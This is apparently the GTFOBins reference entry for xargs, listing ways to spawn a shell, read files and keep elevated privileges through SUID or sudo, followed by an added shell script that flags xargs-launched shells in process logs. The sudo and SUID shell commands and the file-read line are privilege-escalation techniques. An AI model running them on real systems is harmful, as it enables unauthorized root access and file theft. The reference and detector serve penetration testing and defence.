GTFOBins.github.io/_gtfobins/xargs.md
Andrea Cardaci 8eaf595fe6 Make interactive execute whenever possible
Here the trick is to restore those file descriptors (0, 1, 2) that have been
redirected (`dup2`) by the parent process.

First we need to determine which one has been redirected, for example by looking
at `ls -l /proc/$$/fd/`. Then we can use `0<&x`, `1>&x` or `2>&x` to restore 0,
1 or 2 respectively, where `x` is any file descriptor number that points to the
TTY.

It may happen that no file descriptor is unchanged; in that case we can use
`tty` to perform the redirection: `sh <$(tty) >$(tty) 2>$(tty)`
2018-09-07 01:11:06 +02:00

733 B

functions

execute-interactive

- description: GNU version only.
  code: `xargs -a /dev/null sh`
- code: `echo x | xargs -Iy sh -c 'exec sh 0<&1'`
- description: Read interactively from `stdin`.
  code:

      xargs -Ix sh -c 'exec sh 0<&1'
      x^D^D

file-read

- description: This works as long as the file does not contain the NUL character; a trailing `$'\n'` is also added. The actual `/bin/echo` command is executed. GNU version only.
  code:

      LFILE=file_to_read
      xargs -a "$LFILE" -0

suid-enabled

- description: GNU version only.
  code: `./xargs -a /dev/null sh -p`

sudo-enabled

- description: GNU version only.
  code: `sudo xargs -a /dev/null sh`
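The execute, SUID and sudo entries above all have `xargs` launch `sh`, which makes that pattern something to look for in process-execution logs. The following is an added example for defenders, not code from GTFOBins: the function names, the shell list and the sample lines are hypothetical, and it assumes each log record is a whitespace-split command line with GNU `xargs` options.

```shell
# Added example (not GTFOBins code): flag command lines where xargs runs a shell.
# Assumption: each line is a whitespace-split command line; quoting is ignored.

# Print the command xargs would run, or nothing if none is given or found.
xargs_target() {
    set -f; set -- $1; set +f
    # Skip ahead to the xargs token (covers "sudo xargs", "./xargs", pipelines).
    while [ $# -gt 0 ]; do
        case "${1##*/}" in xargs) shift; break ;; esac
        shift
    done
    # Skip xargs options; the ones listed here take a separate argument.
    while [ $# -gt 0 ]; do
        case "$1" in
            --) shift; break ;;
            -a|-d|-E|-I|-L|-n|-P|-s|--arg-file|--delimiter|--max-args|--max-procs|--max-chars|--process-slot-var)
                shift; [ $# -gt 0 ] && shift ;;
            -*) shift ;;
            *) break ;;
        esac
    done
    [ $# -gt 0 ] && printf '%s\n' "$1"
    return 0
}

# Succeeds (exit 0) when the command xargs would run is a shell.
spawns_shell() {
    t=$(xargs_target "$1")
    case "${t##*/}" in
        sh|bash|dash|ash|ksh|zsh) return 0 ;;
    esac
    return 1
}

# Constructed sample command lines, as might be extracted from exec logs.
SAMPLES="xargs -a /dev/null sh
sudo xargs -a /dev/null sh
./xargs -a /dev/null sh -p
echo x | xargs -Iy sh -c 'exec sh 0<&1'
find . -name *.log -print0 | xargs -0 gzip
xargs -a /etc/hostname -0"

# Print an ALERT line for every sample in which xargs launches a shell.
flag_lines() {
    printf '%s\n' "$1" | while IFS= read -r line; do
        if spawns_shell "$line"; then printf 'ALERT: %s\n' "$line"; fi
    done
}

flag_lines "$SAMPLES"
```

The last sample has no command after the options, so `xargs` would run its default `echo`; catching the file-read entry would need a separate rule on the `-a` argument.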